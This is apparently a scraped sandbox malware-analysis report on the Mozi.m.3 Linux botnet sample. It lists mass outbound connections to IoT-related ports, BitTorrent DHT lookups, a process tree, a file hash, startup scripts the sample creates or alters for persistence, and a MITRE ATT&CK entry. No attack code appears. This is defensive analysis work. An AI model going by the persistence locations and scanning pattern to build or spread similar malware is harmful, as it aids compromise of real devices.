Jan 28, 2022 13:57:31.706805944 CET	36188	80	192.168.2.23	111.249.251.6
Jan 28, 2022 13:57:31.706868887 CET	38968	8080	192.168.2.23	55.245.84.60
Jan 28, 2022 13:57:31.706870079 CET	53970	7574	192.168.2.23	200.186.246.157
Jan 28, 2022 13:57:31.706912041 CET	50484	7574	192.168.2.23	102.5.129.5
Jan 28, 2022 13:57:31.706938028 CET	57494	81	192.168.2.23	137.64.79.56
Jan 28, 2022 13:57:31.706948996 CET	41572	8443	192.168.2.23	185.119.191.5
Jan 28, 2022 13:57:31.706973076 CET	34966	37215	192.168.2.23	21.235.94.156
Jan 28, 2022 13:57:31.706979990 CET	53738	37215	192.168.2.23	65.53.76.53
Jan 28, 2022 13:57:31.707007885 CET	39338	52869	192.168.2.23	192.79.212.170
Jan 28, 2022 13:57:31.707027912 CET	38138	7574	192.168.2.23	171.179.128.100
Jan 28, 2022 13:57:31.707053900 CET	43078	80	192.168.2.23	72.88.15.204
Jan 28, 2022 13:57:31.707088947 CET	45068	8080	192.168.2.23	45.25.57.240
Jan 28, 2022 13:57:31.707108021 CET	48750	8080	192.168.2.23	218.50.181.147
Jan 28, 2022 13:57:31.707129002 CET	46710	8080	192.168.2.23	126.28.245.2
Jan 28, 2022 13:57:31.707204103 CET	42706	8443	192.168.2.23	40.107.51.226
Jan 28, 2022 13:57:31.707207918 CET	39332	80	192.168.2.23	216.205.149.24
Jan 28, 2022 13:57:31.707227945 CET	34180	8080	192.168.2.23	126.36.55.25
Jan 28, 2022 13:57:31.707241058 CET	39988	7574	192.168.2.23	90.228.187.181
Jan 28, 2022 13:57:31.707247019 CET	45936	80	192.168.2.23	29.252.61.177
Jan 28, 2022 13:57:31.707277060 CET	38076	8080	192.168.2.23	188.126.206.174
Jan 28, 2022 13:57:31.707297087 CET	47250	7574	192.168.2.23	35.183.126.209
Jan 28, 2022 13:57:31.707317114 CET	53236	8080	192.168.2.23	125.19.179.159
Jan 28, 2022 13:57:31.707333088 CET	42892	80	192.168.2.23	29.90.179.91
Jan 28, 2022 13:57:31.707362890 CET	60724	80	192.168.2.23	52.178.207.54
Jan 28, 2022 13:57:31.707381964 CET	52226	8443	192.168.2.23	187.0.181.7
Jan 28, 2022 13:57:31.707432032 CET	55502	8443	192.168.2.23	198.194.3.135
Jan 28, 2022 13:57:31.707464933 CET	41642	81	192.168.2.23	180.254.127.131
Jan 28, 2022 13:57:31.707478046 CET	54332	8443	192.168.2.23	179.194.207.199
Jan 28, 2022 13:57:31.707505941 CET	53330	8080	192.168.2.23	105.25.244.131
Jan 28, 2022 13:57:31.707535028 CET	60190	5555	192.168.2.23	91.8.221.112
Jan 28, 2022 13:57:31.707561970 CET	48354	52869	192.168.2.23	118.24.78.63
Jan 28, 2022 13:57:31.707583904 CET	54470	80	192.168.2.23	199.238.225.170
Jan 28, 2022 13:57:31.707592010 CET	41650	52869	192.168.2.23	182.6.67.113
Jan 28, 2022 13:57:31.707611084 CET	37162	52869	192.168.2.23	154.2.250.169
Jan 28, 2022 13:57:31.707618952 CET	39162	8080	192.168.2.23	93.65.82.228
Jan 28, 2022 13:57:31.707653999 CET	48362	80	192.168.2.23	87.109.249.191
Jan 28, 2022 13:57:31.707668066 CET	57378	8080	192.168.2.23	31.215.135.3
Jan 28, 2022 13:57:31.707686901 CET	36702	8443	192.168.2.23	95.36.0.71
Jan 28, 2022 13:57:31.707701921 CET	33918	52869	192.168.2.23	186.74.80.35
Jan 28, 2022 13:57:31.707725048 CET	48518	8443	192.168.2.23	173.122.150.192
Jan 28, 2022 13:57:31.707741022 CET	56510	8080	192.168.2.23	217.208.181.28
Jan 28, 2022 13:57:31.707751989 CET	56828	81	192.168.2.23	144.50.58.60
Jan 28, 2022 13:57:31.707778931 CET	41554	81	192.168.2.23	16.185.224.54
Jan 28, 2022 13:57:31.707813025 CET	36666	80	192.168.2.23	24.41.192.212
Jan 28, 2022 13:57:31.707819939 CET	35236	80	192.168.2.23	45.186.47.193
Jan 28, 2022 13:57:31.707843065 CET	60082	37215	192.168.2.23	49.30.95.191
Jan 28, 2022 13:57:31.707859993 CET	58350	8080	192.168.2.23	160.111.162.219
Jan 28, 2022 13:57:31.720230103 CET	49632	8080	192.168.2.23	182.28.59.175
Jan 28, 2022 13:57:31.720236063 CET	46638	49152	192.168.2.23	152.225.18.120
Jan 28, 2022 13:57:31.720292091 CET	46710	80	192.168.2.23	46.27.194.19
Jan 28, 2022 13:57:31.720429897 CET	42056	8080	192.168.2.23	32.23.240.199
Jan 28, 2022 13:57:31.720451117 CET	38178	80	192.168.2.23	212.178.107.187
Jan 28, 2022 13:57:31.720485926 CET	42232	8080	192.168.2.23	83.44.15.163
Jan 28, 2022 13:57:31.720503092 CET	39266	81	192.168.2.23	173.184.209.182
Jan 28, 2022 13:57:31.720529079 CET	36660	37215	192.168.2.23	213.176.82.108
Jan 28, 2022 13:57:31.720561981 CET	46094	52869	192.168.2.23	185.189.197.94
Jan 28, 2022 13:57:31.720571041 CET	50634	80	192.168.2.23	70.41.254.93
Jan 28, 2022 13:57:31.720609903 CET	39130	8080	192.168.2.23	11.152.191.105
Jan 28, 2022 13:57:31.720630884 CET	50886	80	192.168.2.23	137.16.64.6
Jan 28, 2022 13:57:31.720653057 CET	43716	37215	192.168.2.23	219.17.67.235
Jan 28, 2022 13:57:31.720669985 CET	38996	80	192.168.2.23	39.106.152.95
Jan 28, 2022 13:57:31.720700979 CET	53316	8080	192.168.2.23	12.186.198.42
Jan 28, 2022 13:57:31.720719099 CET	40416	81	192.168.2.23	194.243.196.252
Jan 28, 2022 13:57:31.720743895 CET	36448	8080	192.168.2.23	96.17.16.68
Jan 28, 2022 13:57:31.720769882 CET	32944	37215	192.168.2.23	112.176.104.27
Jan 28, 2022 13:57:31.720786095 CET	37630	5555	192.168.2.23	178.182.207.142
Jan 28, 2022 13:57:31.720804930 CET	51470	37215	192.168.2.23	133.193.211.115
Jan 28, 2022 13:57:31.720818996 CET	53422	37215	192.168.2.23	6.42.96.227
Jan 28, 2022 13:57:31.720840931 CET	38924	8080	192.168.2.23	154.44.206.244
Jan 28, 2022 13:57:31.720876932 CET	49572	5555	192.168.2.23	172.199.150.180
Jan 28, 2022 13:57:31.720911026 CET	56090	52869	192.168.2.23	40.217.232.105
Jan 28, 2022 13:57:31.720947981 CET	33300	80	192.168.2.23	42.22.192.85
Jan 28, 2022 13:57:31.720982075 CET	46712	80	192.168.2.23	22.40.86.161
Jan 28, 2022 13:57:31.720994949 CET	57580	49152	192.168.2.23	131.239.170.174
Jan 28, 2022 13:57:31.721023083 CET	43542	7574	192.168.2.23	2.176.99.42
Jan 28, 2022 13:57:31.721050024 CET	39066	80	192.168.2.23	53.126.160.70
Jan 28, 2022 13:57:31.721065044 CET	52996	49152	192.168.2.23	189.232.159.133
Jan 28, 2022 13:57:31.721081972 CET	37014	8080	192.168.2.23	172.128.208.9
Jan 28, 2022 13:57:31.721110106 CET	34582	80	192.168.2.23	51.130.204.177
Jan 28, 2022 13:57:31.721142054 CET	43952	81	192.168.2.23	126.68.225.175
Jan 28, 2022 13:57:31.721163034 CET	45286	80	192.168.2.23	80.204.196.23
Jan 28, 2022 13:57:31.721179008 CET	57672	52869	192.168.2.23	11.216.21.192
Jan 28, 2022 13:57:31.721209049 CET	60434	8080	192.168.2.23	164.17.85.186
Jan 28, 2022 13:57:31.721216917 CET	45776	8080	192.168.2.23	142.34.122.100
Jan 28, 2022 13:57:31.721235991 CET	42756	7574	192.168.2.23	157.160.238.119

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 28, 2022 13:58:09.379921913 CET	192.168.2.23	1.1.1.1	0xec1b	Standard query (0)	dht.transmissionbt.com	A (IP address)	IN (0x0001)
Jan 28, 2022 13:58:09.402530909 CET	192.168.2.23	1.1.1.1	0x1097	Standard query (0)	router.bittorrent.com	A (IP address)	IN (0x0001)
Jan 28, 2022 13:58:09.424213886 CET	192.168.2.23	1.1.1.1	0xeaae	Standard query (0)	router.utorrent.com	A (IP address)	IN (0x0001)
Jan 28, 2022 13:58:09.450418949 CET	192.168.2.23	1.1.1.1	0xa2c8	Standard query (0)	bttracker.debian.org	A (IP address)	IN (0x0001)
Jan 28, 2022 13:58:09.468991995 CET	192.168.2.23	1.1.1.1	0x3ccb	Standard query (0)	bttracker.acc.umu.se	A (IP address)	IN (0x0001)

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 28, 2022 13:58:09.397130013 CET	1.1.1.1	192.168.2.23	0xec1b	No error (0)	dht.transmissionbt.com		87.98.162.88	A (IP address)	IN (0x0001)
Jan 28, 2022 13:58:09.397130013 CET	1.1.1.1	192.168.2.23	0xec1b	No error (0)	dht.transmissionbt.com		212.129.33.59	A (IP address)	IN (0x0001)
Jan 28, 2022 13:58:09.419842958 CET	1.1.1.1	192.168.2.23	0x1097	No error (0)	router.bittorrent.com		67.215.246.10	A (IP address)	IN (0x0001)
Jan 28, 2022 13:58:09.446182966 CET	1.1.1.1	192.168.2.23	0xeaae	No error (0)	router.utorrent.com		82.221.103.244	A (IP address)	IN (0x0001)
Jan 28, 2022 13:58:09.468461990 CET	1.1.1.1	192.168.2.23	0xa2c8	No error (0)	bttracker.debian.org	bttracker.acc.umu.se		CNAME (Canonical name)	IN (0x0001)
Jan 28, 2022 13:58:09.468461990 CET	1.1.1.1	192.168.2.23	0xa2c8	No error (0)	bttracker.acc.umu.se		130.239.18.158	A (IP address)	IN (0x0001)
Jan 28, 2022 13:58:09.487430096 CET	1.1.1.1	192.168.2.23	0x3ccb	No error (0)	bttracker.acc.umu.se		130.239.18.158	A (IP address)	IN (0x0001)

Start time:	13:57:24
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	/tmp/Mozi.m.3
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:25
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:26
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:41
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:42
Start date:	28/01/2022
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time:	13:57:43
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:31
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report Mozi.m.3

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Jbx Signature Overview

AV Detection

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/grub/i386-pc/modinfo.sh

/etc/acpi/asus-keyboard-backlight.sh

/etc/acpi/asus-wireless.sh

/etc/acpi/ibm-wireless.sh

/etc/acpi/tosh-wireless.sh

/etc/acpi/undock.sh

/etc/console-setup/cached_setup_font.sh

/etc/console-setup/cached_setup_keyboard.sh

/etc/console-setup/cached_setup_terminal.sh

/etc/gdm3/config-error-dialog.sh

/etc/init.d/S95baby.sh

/etc/init.d/console-setup.sh

/etc/init.d/hwclock.sh

/etc/init.d/keyboard-setup.sh

/etc/profile.d/01-locale-fix.sh

/etc/profile.d/Z97-byobu.sh

/etc/profile.d/Z99-cloud-locale-test.sh

/etc/profile.d/Z99-cloudinit-warnings.sh

/etc/profile.d/apps-bin-path.sh

/etc/profile.d/bash_completion.sh

/etc/profile.d/cedilla-portuguese.sh

/etc/profile.d/gawk.sh

/etc/profile.d/im-config_wayland.sh

/etc/profile.d/vte-2.91.sh

/etc/profile.d/xdg_dirs_desktop_session.sh

/etc/rcS.d/S95baby.sh

Linux Analysis Report
Mozi.m.3

Start time:	13:57:36
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:46
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:47
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:48
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:49
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:57:50
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:58:06
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	13:58:07
Start date:	28/01/2022
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time:	13:58:08
Start date:	28/01/2022
Path:	/tmp/Mozi.m.3
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre